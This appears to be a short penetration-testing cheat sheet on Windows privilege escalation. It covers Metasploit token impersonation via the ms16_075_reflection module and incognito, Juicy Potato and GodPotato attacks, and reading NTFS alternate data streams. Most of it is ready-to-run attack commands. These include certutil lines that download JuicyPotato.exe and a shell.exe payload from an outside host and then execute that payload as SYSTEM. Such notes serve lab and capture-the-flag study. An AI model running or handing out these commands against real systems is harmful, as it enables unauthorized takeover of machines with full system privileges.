Token Impersonation Overview
Escalation via Potato Attack
Copy background
use exploit/windows/local/ms16_075_reflection
set LHOST tun0
set LPORT 1738 <-- Something different from the first shell
exploit
Copy load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
shell
whoami
Manual Juicy Potato Attack
Copy cd C:\Windows\System32\spool\drivers\color\
certutil.exe -urlcache -f http://10.9.209.91/JuicyPotato.exe juicy.exe
certutil.exe -urlcache -f http://10.9.209.91/shell.exe
juicy.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p "C:\Windows\System32\spool\drivers\color\shell.exe"
Copy godpotato.exe -cmd "cmd /c whoami"
Alternate datastreams are a file attribute in NTFS only. Regular data stream is primary text inside of a file. Alternate is a way to hide informtion inside of a file
Copy dir /r
more hm.txt:root.txt:$DATA